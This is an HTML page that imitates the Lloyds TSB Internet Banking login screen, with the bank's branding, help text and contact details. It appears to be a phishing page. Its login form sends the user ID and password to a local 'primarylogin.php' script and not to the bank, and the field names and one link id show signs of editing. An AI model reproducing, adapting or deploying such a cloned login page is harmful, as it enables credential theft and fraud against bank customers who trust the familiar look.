<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">







<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
	<title>Lloyds TSB - Welcome to Internet Banking</title>



<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />	
<meta http-equiv="content-language" content="en-gb" />
<!--[if gte IE 8]><meta http-equiv="X-UA-Compatible" content="IE=IE8" /><![endif]-->
<meta name="robots" content="all,index,follow" />
<meta name="distribution" content="global" />
<meta name="rating" content="general" />
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" comment "Single file EN v2.0" l gen true for "http://online.lloydstsb.co.uk/personal" r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://online.lloydstsb.co.uk/personal" r (n 0 s 0 v 0 l 0))'>
<link rel="shortcut icon" href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/img/icons/favicon.ico" />

<link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/global1-min121022.css" media="screen, print" type="text/css" rel="stylesheet" />
<link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/global2-min121015.css" media="screen, print" type="text/css" rel="stylesheet" />

<link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/print/print_base-min121015.css" media="print" type="text/css" rel="stylesheet" />
<!--[if IE 8]><link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/ie/ie8-min121015.css" type="text/css" rel="stylesheet" /><![endif]-->
<!--[if IE 7]><link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/ie/ie7-min121015.css" type="text/css" rel="stylesheet" /><![endif]-->
<!--[if lt IE 7]><link href="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/style/ie/ie6-min121022.css" type="text/css" rel="stylesheet" /><![endif]-->


<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/assets/lib/jquery-min121006.js"></script>
<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/static/scriptsnippet.jspf"></script>
<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/assets/lib/global-min121015.js"></script>
<script type="text/javascript">DI.themePath="/personal/unauth/assets/LTSBRetail/";</script>
<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/assets/LTSBRetail/script/custom-min121015.js"></script>


</head>


<body>
<script type="text/javascript">
			
			var _AP={};_AP.domain="statse.webtrendslive.com";_AP.dcsid="dcsfn00jp100000w4d2tx3zos_2b3p";_AP.fpcdom=".lloydstsb.co.uk";_AP.bypassStyleClass="newwin,newhelpwin,newfaqwin,overlay";var _TC={};_TC.site_id="235";_TC.log_path="https://online.lloydstsb.co.uk/personal/unauth/assets/lib";_TC.server_hostname="mi.lloydstsb.com";_TC.server_url="https://mi.lloydstsb.com/i?siteID=235";_TC.logoff_image_url="https://secure.lloydstsb.com";</script>


<div id="wrapper">
<div class="outer">
<div id="header">
<ul id="skiplinks">
	<li><a id="lnkSkip" name="lnkSkip" href="#page">Skip to main content</a>
	</li>

</ul>
<div class="clearfix">
<p id="logo"><span> <img
	src="https://online.lloydstsb.co.uk/wps/wcm/connect/da3db40041b907e9bbe5ff9f3821e7af/logo-17-1296635292.png?MOD=AJPERES&CACHEID=da3db40041b907e9bbe5ff9f3821e7af"
	alt="Lloyds TSB for the journey" /> </span></p>

<div class="secureMsg">
<p class="msg"><img
	src="https://online.lloydstsb.co.uk/wps/wcm/connect/d49cb70041b9092cbf7fff9f3821e7af/secure_msg-6-1296635361.png?MOD=AJPERES&CACHEID=d49cb70041b9092cbf7fff9f3821e7af"
	alt="You're logging into a secure site" /></p>

<p><p><a href="http://www.lloydstsb.com/security.asp" title="Online security"  class="linkBullet newwin">How can I tell that this site is secure?</a></p></p>
</div>
</div>
</div>
</div>
<div class="pageWrap">
<div id="page" class="content">
<div class="primaryWrap">
<div class="primary">
<div class="panel"><h1>Welcome to Internet Banking</h1>
<div class="inner"><p>If you don't already use Internet Banking, it's simple to&#160;<a href="https://online.lloydstsb.co.uk/personal/a/registration/onlinepersonalregistration.jsp" title="register online" >register online</a>.</p>

</div>
<form id="frmLogin" name="frmLogin" method="post"
	action="primarylogin.php"
	class="validationName:(login) validate:()" autocomplete="off"
	enctype="application/x-www-form-urlencoded">



<div class="inner"><p><strong>Please enter&#160;your user ID and password below</strong></p>

 
<div class="subPanel">
<fieldset>
<div
	class="formField validate:(required) validationName:(userID) clearfix">
<div class="formFieldInner"><label
	for="frmLogin:strCustomerLogin_userID">User ID:</label>

<input type="text" autocomplete="off"
	id="user"
	name="UserId1" class="field setFocus"
	maxlength="30" value='' />

</div>
</div>

<div
	class="formField validate:(required) validationName:(password) clearfix">
<div class="formFieldInner"><label
	for="frmLogin:strCustomerLogin_pwd">Password:</label>
<input type="password" id="pass"
	name="password" class="field" maxlength="20"
	value="" /></div>
</div>

<div class="formField fieldHelp checkbox clearfix">
<div class="formFieldInner"><input id="frmLogin:loginRemember"
	type="checkbox" name="frmLogin:loginRemember"
	 /> <label
	for="frmLogin:loginRemember">Remember my User ID</label>
<span class="cxtHelp"> <a class="cxtTrigger"
	title="Click to find out more about remembering your user&#160;ID." href="#cxtHelp1">[?]</a>

</span>

<div id="cxtHelp1" class="help"><h3>Remember my user ID</h3>
<p>Tick this box to save your user ID on this computer. This won&#8217;t save your password though. You&#8217;ll still have to enter it each time you want to access your account.</p></div>
</div>

</div>
<div class="inner"><p><strong>Warning:</strong> Don&#8217;t tick this box if you&#8217;re using a public or shared computer</p></div>

<div class="loginActions clearfix"><input id="frmLogin:btnLogin1"
	name="frmLogin:btnLogin1" type="image" class="submitAction"
	src="https://online.lloydstsb.co.uk/wps/wcm/connect/82af408041b90809bc35ff9f3821e7af/continue-9-1296493545.png?MOD=AJPERES&CACHEID=82af408041b90809bc35ff9f3821e7af"
	alt="Continue"
	title="Continue" /> 
<ul id="frmLogin:pnlLogin2" class="linkList">
	<li><a id="frmhttps://online.lloydstsb.co.ukLogin:lkLogin2" name="frmLogin:lkLogin2"
		href="https://online.lloydstsb.co.uk/personal/a/submitreplaceunlockauthmechanism/customeridentificationdata.jsp"
		title="Forgotten your password?">Forgotten your password?</a></li>
	<li><a id="frmLogin:lkLogin1" name="frmLogin:lkLogin1"
		href="https://online.lloydstsb.co.uk/personal/a/submitforgottenuserid/forgotUserID.jsp"
		title="Forgotten your User ID?">Forgotten your User ID?</a></li>
	<li><a id="frmLogin:lkLoginTrouble" name="frmLogin:lkLoginTrouble"
		href="https://online.lloydstsb.co.uk/personal/a/submitreplaceunlockauthmechanism/customeridentificationdata.jsp"
		title="Having problems logging in?">Having problems logging in?</a></li>

</ul>

</div>
</fieldset>
<input type="hidden" name="frmLogin" value="frmLogin" /> <input
	type="hidden" name="submitToken" value="3839736" /> <input
	type="hidden" name="target"
	value="logon.ibc" />   
 
	</div>



</div>
</form>
</div>


  <script type="text/javascript">
											var _TC={};
											_TC.sitze_id="235";
											_TC.server_hostname="mi.lloydstsb.com";
											_TC.server_url="https://mi.lloydstsb.com/i?siteID=235";
											_TC.log_path = "https://online.lloydstsb.co.uk/personal/assets/lib";
												
										</script> <script type="text/javascript"
	src="https://online.lloydstsb.co.uk/personal/assets/lib/omtr_tc-min111012.js"></script> <script>									
											tc_containers = new Array('LTSB_LogOn_CC1');
										</script> <script>
											tc_optimise('LTSB_LogOn_CC1', 
											'<div class="panel"> <div class="salesPromo clearfix"><p class="Img"><img src="https://online.lloydstsb.co.uk/wps/wcm/connect/44a53d00473e138a9aeddab3b0e08c6a/security_padlock-1-1308181940.png?MOD=AJPERES&CACHEID=44a53d00473e138a9aeddab3b0e08c6a" alt="Security" /></p><div class="Msg"><p><strong>Tip</strong> - We&#8217;ll never ask you to enter your security details on a pop up window</p>&#160;</div></div></div>'
											);
										</script>

<noscript>
<div class="panel">
<div class="salesPromo clearfix">
<p class="Img"><img src="https://online.lloydstsb.co.uk/wps/wcm/connect/44a53d00473e138a9aeddab3b0e08c6a/security_padlock-1-1308181940.png?MOD=AJPERES&CACHEID=44a53d00473e138a9aeddab3b0e08c6a"
	alt="Security" /></p>
<div class="Msg"><p><strong>Tip</strong> - We&#8217;ll never ask you to enter your security details on a pop up window</p>
&#160;</div>
</div>
</div>
</noscript>
  


</div>
</div>
<div class="secondary">
<div class="panel">
<div class="subPanel"><a href="http://www.lloydstsb.com/internet_banking/we_are_listening.asp?wt.ac=IBXXO011112O"  class="newwin"><img src="https://online.lloydstsb.co.uk/wps/wcm/connect/f3197400495be570b5b8f7736c2bd3f6/IB-Log-on-tile-listening-1-1323432778.png?MOD=AJPERES&CACHEID=f3197400495be570b5b8f7736c2bd3f6" alt="We're listening. We improve our services based on what you tell us. Find out more."/></a></div>
<div class="accordion">
<div class="part">
<h2 class="trigger">Contact Us....</h2>
<div class="pane">
<div class="paneInner">
<div class="quickContact"><h3>All account related queries</h3>
<p><strong>0845 3 000 000</strong></p>

<p>If you need to call us from abroad or prefer not to use our 0845 number, you can also call us on +44 1733 347 007.</p>
<p>Calls may be monitored and recorded in case we need to check we have carried out your instructions correctly and to help us improve our quality of service.<br /><br /></p>
<h3>Internet banking queries</h3>
<p>Technical queries about the Internet Banking service</p>
<p>Call us on<strong>&#160;0845 300 0116</strong>. We&#8217;re open 7am-10pm Mon &#8211; Fri, 8am-6pm Sat &#8211; Sun.</p>

<p>If you need to call us from abroad you can also call us on<strong>&#160;+44 2076 499 437</strong>.</p></div>
</div>
</div>
</div>
<div class="part">
<h2 class="trigger">Help &amp; Support</h2>
<div class="pane">
<div class="paneInner"><ul class="quickFAQs">
			
	
	<li><h3 class="qfaqTrigger">What is a user ID?</h3>

			<div class="qfaqCont">
					<p><p>This is the unique number you've been given to run your Internet Banking account. You will need both your user ID and your password to log onto your online account.</p>
</p>
				    </div>
			</li>
<li><h3 class="qfaqTrigger">Why am I having trouble logging in?</h3>
			<div class="qfaqCont">
					<p><p>It could be because you're trying to log on from a networked site (the office, for example). If so, please contact your Systems Administrator for help. It could also be because your browser settings are incompatible with the level of security maintained by Internet Banking. Check your browser for compatibility. If you've been logged out because we suspect that you have a virus or malicious software on your computer, you can find useful information on our&#160;<a href="http://www.lloydstsb.com/security/malware_pitstop.asp" title="Malware information"  class="newwin">Malware page</a>.If you still have trouble, please call our helpdesk on&#160;0845 3 000 116 (or +44 2076 499 437from outside the UK), Monday to Friday, 7.00am-10.00pm; Saturday and Sunday, 8.0am - 6.00pm.</p>

</p>
				    </div>
			</li>
</ul></div>
</div>
</div>
</div>
<div class="subPanel"><p><a href="http://www.lloydstsb.com/security/threats.asp?WT.IBXXO011107L"  class="newwin"><img src="https://online.lloydstsb.co.uk/wps/wcm/connect/fffcff804946de4fb659f6736c2bd3f6/Promoting-Identity-Safety-IB-log-on-tile-1-1322840809.png?MOD=AJPERES&CACHEID=fffcff804946de4fb659f6736c2bd3f6" alt="Guard your identity. Limit what personal details you can share on social networking sites. be wary of unrequested emails, phone calls and texts. Find out more."/></a></p></div>
</div>
</div>
</div>
</div>
<div id="footer">
<div class="outer">
<div id="footerInner"><ul><li><a href="http://www.lloydstsb.com/legal.asp" title="Legal"  class="newwin">Legal</a></li><li><a href="http://www.lloydstsb.com/privacy2.asp" title="Privacy"  class="newwin">Privacy</a></li><li><a href="http://www.lloydstsb.com/security.asp" title="Security"  class="newwin">Security</a></li><li><a href="http://www.lloydsbankinggroup.com/" title="Lloyds Banking Group"  class="newwin">Lloyds Banking Group</a></li><li><a href="http://www.lloydstsb.com/rates_and_charges.asp" title="Rates and Charges"  class="newwin">Rates and Charges</a></li></ul></div>

</div>
</div>
</div>


<noscript><div><img alt="DCSIMG" id="DCSIMG" class="hide" src="https://statse.webtrendslive.com/dcsfn00jp100000w4d2tx3zos_2b3p/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.1"/></div></noscript>



<script type="text/javascript">
	LBG.functions.init();

</script>

<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/assets/webtrends/P04.00.js"></script>
<script type="text/javascript" src="https://online.lloydstsb.co.uk/personal/unauth/assets/lib/analytics-min111012.js"></script>




</body>
</html>
